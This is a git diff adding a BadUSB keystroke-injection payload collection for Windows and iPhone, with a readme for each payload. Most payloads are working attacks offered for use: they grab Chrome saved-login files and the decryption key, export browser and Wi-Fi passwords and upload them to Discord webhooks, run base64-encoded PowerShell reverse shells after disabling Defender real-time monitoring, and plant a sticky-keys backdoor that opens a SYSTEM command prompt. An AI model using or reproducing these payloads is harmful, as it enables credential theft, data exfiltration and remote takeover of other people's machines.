+STRING $sourceFile1 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; $outputFile1 = "$([System.Environment]::GetFolderPath('Desktop'))\output.txt"; Copy-Item $sourceFile1 $outputFile1; Upload-Discord -file $outputFile1 -text ":)"; Remove-Item $outputFile1; $sourceFile2 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"; $outputFile2 = "$([System.Environment]::GetFolderPath('Desktop'))\key.txt"; Copy-Item $sourceFile2 $outputFile2; Upload-Discord -file $outputFile2 -text "Key-File"; Remove-Item $outputFile2
+ENTER
+DELAY 1000
+STRING exit
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md
new file mode 100644
index 000000000..35322c8a2
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/ChromePasswords/readme.md
@@ -0,0 +1,39 @@
+
+# chrome_passwords_discord
+Grabs the "key" and "login data" file for google chrome and sends them to a discord webhook. To decrypt please read below.
+
+## How to use?
+
+Well this script is kind of plug and play. After the two files ("encryped passwords" and "key.txt") got sent to your webhook, you will have to decrypt the passwords.
+
+To do this, I have coded a python program that will use the grabbed "key" to decrypt the passwords.
+
+Get the [program]
+
+
+## Features
+
+- open powershell
+- grab 2 files
+- send files to webhook
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+[program]: https://github.com/UNC0V3R3D/ChromeDecrypter
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt
new file mode 100644
index 000000000..ece51065f
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/Show_Saved_Passwords.txt
@@ -0,0 +1,21 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: New script for getting all Webbrowser passwords and sending them to a discord-webhook.
+REM Version: 1.0
+REM Category: Passwords
+DELAY 500
+WINDOWS d
+DELAY 500
+WINDOWS r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 800
+LEFTARROW
+ENTER
+DELAY 800
+STRING $hookurl = "webhook url here"
+ENTER
+DELAY 300
+STRING mkdir \temp; cd \temp; Invoke-WebRequest -Headers @{'Referer' = 'http://www.nirsoft.net/utils/web_browser_password.html'} -Uri https://www.nirsoft.net/toolsdownload/webbrowserpassview.zip -OutFile wbpv.zip; Invoke-WebRequest -Uri https://www.7-zip.org/a/7za920.zip -OutFile 7z.zip; Expand-Archive 7z.zip; .\7z\7za.exe e wbpv.zip; Start-Sleep -Seconds 5; $pass = ConvertTo-SecureString 'wbpv28821@' -AsPlainText -Force; $cred = New-Object System.Management.Automation.PSCredential ('', $pass); Start-Process -FilePath .\WebBrowserPassView.exe -Credential $cred -Wait; Start-Sleep -Seconds 3; $wshell = New-Object -ComObject Wscript.Shell; $wshell.SendKeys('^{A}'); $wshell.SendKeys('^{S}'); Start-Sleep -Seconds 1; $wshell.SendKeys('export'); $wshell.SendKeys('{Tab}'); $wshell.SendKeys('h'); $wshell.SendKeys('{Enter}'); Start-Sleep -Seconds 1; $wshell.SendKeys('%{F4}'); Start-Sleep -Seconds 1; $file = 'C:\temp\export.htm'; function Upload-Discord {[CmdletBinding()] param ([parameter(Position=0,Mandatory=$False)][string]$file,[parameter(Position=1,Mandatory=$False)][string]$text); $Body = @{'username' = $env:username; 'content' = $text}; if (-not ([string]::IsNullOrEmpty($text))){Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F 'file1=@$file' $hookurl}; }; Upload-Discord -file 'C:\temp\export.htm' -text 'File:'
+ENTER
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md
new file mode 100644
index 000000000..b0ac24828
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/Show_Saved_Password/readme.md
@@ -0,0 +1,38 @@
+
+# Show_Saved_Passwords
+Shows all saved passwords.
+
+## How to use?
+
+This script is not plug and play. You have to make the following changes:
+
+- change the discord webhook url (Line 16)
+
+
+## Features
+
+- open powershell
+- download webbrowserview.exe
+- save passwords from webbrowsers
+- send file to discord webhook
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt
new file mode 100644
index 000000000..a1eb96e82
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/StealWifiKeys.txt
@@ -0,0 +1,21 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Steals all of the saved Wifi Passwords and stores them into a file.
+REM Version: 1.0
+REM Category: Passwords
+DELAY 500
+WINDOWS d
+DELAY 500
+WINDOWS r
+DELAY 500
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 800
+LEFTARROW
+ENTER
+DELAY 800
+ALT y
+DELAY 500
+GUI UP
+DELAY 600
+STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath C:PUT PATH HERE\ResultsPassword.zip ; exit
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md
new file mode 100644
index 000000000..f9ecd47e5
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys/readme.md
@@ -0,0 +1,37 @@
+
+# StealWifiKeys
+Steals all of the saved Wifi Passwords and stores them into a file.
+
+## How to use?
+
+This script is not plug and play. You will need to do the following changes:
+
+- change destination path "-DestinationPath C:PUT PATH HERE\ResultsPassword.zip"
+
+
+## Features
+
+- open powershell
+- grab wifi keys
+- store keys to a file
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt
new file mode 100644
index 000000000..5e2793348
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/StealWifiKeys_Discord.txt
@@ -0,0 +1,21 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Steals all of the saved Wifi Passwords and sends them to a discord webhook.
+REM Version: 1.0
+REM Category: Passwords
+DELAY 750
+WINDOWS d
+DELAY 1500
+WINDOWS r
+DELAY 1500
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 750
+LEFTARROW
+ENTER
+DELAY 1200
+ALT y
+DELAY 1200
+GUI UP
+DELAY 1200
+STRING $hookurl = "DISCORD WEBHOOK URL"; $folderDateTime = (get-date).ToString('d-M-y HHmmss'); $userDir = (Get-ChildItem env:\userprofile).value + '\UNC0V3R3D ' + $folderDateTime; $fileSaveDir = New-Item ($userDir) -ItemType Directory; $date = get-date; netsh wlan export profile key=clear folder=$fileSaveDir; Compress-Archive -Path $fileSaveDir -DestinationPath c:\results-74935290.zip; $Body = @{'username' = $env:username; 'content' = "Obiwan: Hello there!"}; Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json); curl.exe -F 'file1=@c:\results-74935290.zip' $hookurl;
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md
new file mode 100644
index 000000000..c91823b29
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_Discord/readme.md
@@ -0,0 +1,36 @@
+
+# StealWifiKeys_Discord
+Steals all of the saved Wifi Passwords, stores them to a file and uplaods the file to a discord webhook.
+
+## How to use?
+
+This script is not plug and play. You will need to do the following changes:
+
+- change webhook url
+
+
+## Features
+
+- open powershell
+- grab wifi keys
+- store keys to a file
+- sends file to discord webhook
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt
new file mode 100644
index 000000000..1457b5203
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/StealWifiKeys_onUSB.txt
@@ -0,0 +1,20 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Steals all of the saved Wifi Passwords and stores them into a USB device of your choice.
+REM Version: 1.0
+REM Category: Passwords
+DELAY 750
+WINDOWS d
+DELAY 1000
+WINDOWS r
+DELAY 900
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 750
+LEFTARROW
+ENTER
+DELAY 900
+ALT y
+DELAY 900
+GUI UP
+DELAY 900
+STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss');$userDir = (Get-ChildItem env:\userprofile).value + '\Walkuer Ghost Report ' + $folderDateTime;$fileSaveDir = New-Item ($userDir) -ItemType Directory;$date = get-date;netsh wlan export profile key=clear folder=$fileSaveDir;Compress-Archive -Path $fileSaveDir -DestinationPath File path on USB device here
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md
new file mode 100644
index 000000000..93400394e
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/PasswordStuff/StealWifiKeys_onUSB/readme.md
@@ -0,0 +1,37 @@
+
+# StealWifiKeys_onUSB
+Steals all of the saved Wifi Passwords and stores them into a file, then puts the file on a usb device connected to the target pc.
+
+## How to use?
+
+This script is not plug and play and only for experienced users. You will need to do the following changes:
+
+- change path to the usb device "-DestinationPath File path on USB device here"
+
+
+## Features
+
+- open powershell
+- grab wifi keys
+- store keys to a file on a usb device
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt
new file mode 100644
index 000000000..da239a432
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/better-rev-shell.txt
@@ -0,0 +1,35 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Better reverse PowerShell. In case of problems, please open an issue.
+REM Version: 1.0
+REM Category: Remote-Access
+DELAY 750
+WINDOWS d
+DELAY 1500
+WINDOWS r
+DELAY 1500
+STRING powershell Start-Process powershell -Verb runAs
+ENTER
+DELAY 560
+LEFTARROW
+DELAY 500
+ENTER
+DELAY 700
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+ENTER
+DELAY 700
+STRING Add-Type -MemberDefinition @'[DllImport("user32.dll")] public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);[DllImport("user32.dll")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'@ -Name WinAPI -Namespace Win32 -PassThru;$Window=[Win32.WinAPI]::FindWindow("ConsoleWindowClass",(Get-Process -Id $PID).MainWindowTitle);$Win32.WinAPI::ShowWindow($Window,0)
+DELAY 700
+STRING ip = 'YOUR-IP HERE';
+ENTER
+DELAY 700
+STRING port = 'PORT HERE';
+ENTER
+DELAY 700
+STRING encoded_command = 'cG93ZXJzaGVsbCAtbm9wIC1XIGhpZGRlbiAtbm9uaSAtZXAgYnlwYXNzIC1jICIkVENQQ2xpZW50ID0gTmV3LU9iamVjdCBOZXQuU29ja2V0cy5UQ1BDbGllbnQoJzx1c2VyX2RlZmluZWRfaXA+JywgPHVzZXJfZGVmaW5lZF9wb3J0Pik7JE5ldHdvcmtTdHJlYW0gPSAkVENQQ2xpZW50LkdldFN0cmVhbSgpOyRTdHJlYW1Xcml0ZXIgPSBOZXctT2JqZWN0IElPLlN0cmVhbVdyaXRlcigkTmV0d29ya1N0cmVhbSk7ZnVuY3Rpb24gV3JpdGVUb1N0cmVhbSAoJFN0cmluZykge1tieXRlW11dJHNjcmlwdDpCdWZmZXIgPSAwLi4kVENQQ2xpZW50LlJlY2VpdmVCdWZmZXJTaXplIHwgJSB7MH07JFN0cmVhbVdyaXRlci5Xcml0ZSgkU3RyaW5nICsgJ1NIRUxMPiAnKTskU3RyZWFtV3JpdGVyLkZsdXNoKCl9V3JpdGVUb1N0cmVhbSAnJzt3aGlsZSgoJEJ5dGVzUmVhZCA9ICROZXR3b3JrU3RyZWFtLlJlYWQoJEJ1ZmZlciwgMCwgJEJ1ZmZlci5MZW5ndGgpKSAtZ3QgMCkgeyRDb21tYW5kID0gKFt0ZXh0LmVuY29kaW5nXTo6VVRGOCkuR2V0U3RyaW5nKCRCdWZmZXIsIDAsICRCeXRlc1JlYWQgLSAxKTskT3V0cHV0ID0gdHJ5IHtJbnZva2UtRXhwcmVzc2lvbiAkQ29tbWFuZCAyPiYxIHwgT3V0LVN0cmluZ30gY2F0Y2ggeyRfIHwgT3V0LVN0cmluZ31Xcml0ZVRvU3RyZWFtICgkT3V0cHV0KX0kU3RyZWFtV3JpdGVyLkNsb3NlKCki'
+ENTER
+DELAY 700
+STRING -e encoded_command
+ENTER
+DELAY 2000
+STRING -e JFdpbmRvdz0kV2luQVBJOjpGaW5kV2luZG93KCJDb25zb2xlV2luZG93Q2xhc3MiLChHZXQtUHJvY2VzcyAtSWQgJFBJRCkuTWFpbldpbmRvd1RpdGxlKTskV2luQVBJOjpTaG93V2luZG93KCRXaW5kb3csMCk=
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md
new file mode 100644
index 000000000..274cfd171
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/Better-Reverse-Shell/readme.md
@@ -0,0 +1,41 @@
+
+# Better-Rev-Shell
+
+This script is for learning purposes only. I am not responsible for your actions and not going to help you setting up the scripts as I don't want to get into trouble. I do/will not support any illegal activities.
+
+
+
+
+## How to use?
+
+This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
+
+
+
+
+## Features
+
+- x
+
+
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
new file mode 100644
index 000000000..38752a93d
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/CommandLineBackdoor.txt
@@ -0,0 +1,100 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Creates a command prompt "backdoor" that can be launched in almost any "secure" Windows environment,
+REM (Lock Screen for example) via Sticky Keys shortcuts (Pressing shift five times) or the keyboard combination Alt+Shift+PrtScr.
+REM This then results in launching the command prompt in the same account as the current environment, i.e. SYSTEM or your user account.
+REM Version: 1.0
+REM Category: Remote_Access
+REM plug in second USB in before the Flipper
+DELAY 3000
+CONTROL ESCAPE
+DELAY 500
+STRING notepad
+DELAY 250
+ENTER
+DELAY 750
+STRING @echo off
+ENTER
+STRING :init
+ENTER
+STRING setlocal DisableDelayedExpansion
+ENTER
+STRING set cmdInvoke=1
+ENTER
+STRING set winSysFolder=System32
+ENTER
+STRING set "batchPath=%~0"
+ENTER
+STRING for %%k in (%0) do set batchName=%%~nk
+ENTER
+STRING set "TEMPVBS=%temp%\OEgetPriv_run.vbs"
+ENTER
+STRING setlocal EnableDelayedExpansion
+ENTER
+STRING :checkPrivileges
+ENTER
+STRING NET FILE 1>NUL 2>NUL
+ENTER
+STRING if '%errorlevel%' == '0' (goto gotPrivileges) else (goto getPrivileges)
+ENTER
+STRING :getPrivileges
+ENTER
+STRING if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
+ENTER
+STRING echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMPVBS%"
+ENTER
+STRING echo args = "ELEV " >> "%TEMPVBS%"
+ENTER
+STRING echo For Each strArg in WScript.Arguments >> "%TEMPVBS%"
+ENTER
+STRING echo args = args ^& strArg ^& " " >> "%TEMPVBS%"
+ENTER
+STRING echo Next>> "%TEMPVBS%"
+ENTER
+STRING if '%cmdInvoke%'=='1' goto InvokeCmd
+ENTER
+STRING echo UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%TEMPVBS%"
+ENTER
+STRING goto ExecElevation
+ENTER
+STRING :InvokeCmd
+ENTER
+STRING echo args = "/c """ + "!batchPath!" + """ " + args >> "%TEMPVBS%"
+ENTER
+STRING echo UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%TEMPVBS%"
+ENTER
+STRING :ExecElevation
+ENTER
+STRING "%SystemRoot%\%winSysFolder%\WScript.exe" "%TEMPVBS%" %*
+ENTER
+STRING exit /B
+ENTER
+STRING :gotPrivileges
+ENTER
+STRING setlocal & cd /d "%~dp0."
+ENTER
+STRING if '%1'=='ELEV' (del "%TEMPVBS%" 1>nul 2>nul & shift /1)
+ENTER
+STRING reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /ve /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f && cls && echo Payload Installed Successfully && pause && goto end
+ENTER
+STRING cls
+ENTER
+STRING echo Payload Install Failed
+ENTER
+STRING pause
+ENTER
+STRING :end
+ENTER
+STRING del /F /Q "%~0" && exit
+CONTROL s
+DELAY 500
+STRING %temp%\run.bat
+TAB
+STRING a
+ENTER
+DELAY 250
+ALT F4
+DELAY 250
+CONTROL ESCAPE
+DELAY 500
+STRING %temp%\run.bat
+ENTER
\ No newline at end of file
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md
new file mode 100644
index 000000000..7caa7ba7a
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/CommandLineBackdoor/readme.md
@@ -0,0 +1,33 @@
+
+# CommandLineBackdoor
+This script is for learning purposes only. I am not responsible for your actions and not going to help you with anything.
+
+## How to use?
+
+This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
+
+
+## Features
+
+- x
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt
new file mode 100644
index 000000000..36db3151e
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/ReversePowershell.txt
@@ -0,0 +1,59 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
+REM Version: 1.0
+REM Category: Remote_Access
+DELAY 750
+GUI r
+DELAY 1000
+STRING powershell Start-Process notepad -Verb runAs
+ENTER
+DELAY 750
+ALT y
+DELAY 750
+ENTER
+ALT SPACE
+DELAY 1000
+STRING m
+DELAY 1000
+DOWNARROW
+REPEAT 100
+ENTER
+STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
+ENTER
+DELAY 750
+STRING Set-MpPreference -DisableRealtimeMonitoring $true
+DELAY 500
+ENTER
+DELAY 750
+STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
+ENTER
+STRING Remove-Item $MyINvocation.InvocationName
+ENTER
+CTRL s
+DELAY 1000
+STRING C:\Windows\config-34593.ps1
+ENTER
+DELAY 1000
+ALT F4
+DELAY 750
+GUI r
+DELAY 750
+STRING powershell Start-Process cmd -Verb runAs
+ENTER
+DELAY 750
+ALT y
+DELAY 1000
+STRING mode con:cols=14 lines=1
+ENTER
+ALT SPACE
+DELAY 750
+STRING m
+DELAY 750
+DOWNARROW
+REPEAT 100
+ENTER
+STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
+ENTER
+DELAY 750
+STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md
new file mode 100644
index 000000000..18be229cf
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/Windows_Badusb/Remote-Access/ReversePowershell/readme.md
@@ -0,0 +1,33 @@
+
+# ReversePowershell
+This script is for learning purposes only. I am not responsible for your actions and not going to help you setting up the scripts as I don't want to get into trouble. I do/will not support any illegal activities.
+
+## How to use?
+
+This script is not plug and play and only for experienced users. You will need to do everything on your own as I am not responsible.
+
+
+## Features
+
+- x
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt
new file mode 100644
index 000000000..c661cd240
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/iPhone_open_website.txt
@@ -0,0 +1,15 @@
+REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
+REM Description: Open any website on an iPhone.
+REM Version: 1.0
+REM Category: iPhone
+DELAY 1000
+GUI SPACE
+DELAY 500
+STRING safari
+DELAY 500
+ENTER
+DELAY 1000
+REM Insert your website below :)
+STRING www.yourwebsite.com
+DELAY 500
+ENTER
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md
new file mode 100644
index 000000000..ec4c0cb77
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/iPhone_Badusb/open-website/readme.md
@@ -0,0 +1,42 @@
+
+# iPhone_open_website
+
+This script will open any website on an iPhone.
+
+
+
+
+## How to use?
+
+This script is not plug and play. Insert the url that you want to open right here "STRING www.yourwebsite.com"
+
+
+
+
+## Features
+
+- open website
+
+
+
+
+## Feedback
+
+If you have any feedback, please reach out to me via Discord "UNC0V3R3D#8662".
+
+
+
+
+
+
+## Support
+
+For support, contact me via Discord "UNC0V3R3D#8662".
+
+
+## Meta
+
+
+- If you want to sponsor me on Patreon, the link is on my profile.
+
+
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1 b/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1
new file mode 100644
index 000000000..4443b5768
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/language.ps1
@@ -0,0 +1 @@
+Write-Output “This is just the language file so just ignore it”
diff --git a/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md b/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md
new file mode 100644
index 000000000..e3fe2f600
--- /dev/null
+++ b/BadUSB/UNC0V3R3D-BadUSB-Collection/license.md
@@ -0,0 +1,175 @@
+# Attribution-NonCommercial-ShareAlike 4.0 International
+
+Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible.
+
+### Using Creative Commons Public Licenses
+
+Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses.
+
+* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors).
+
+* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees).
+
+## Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International Public License
+
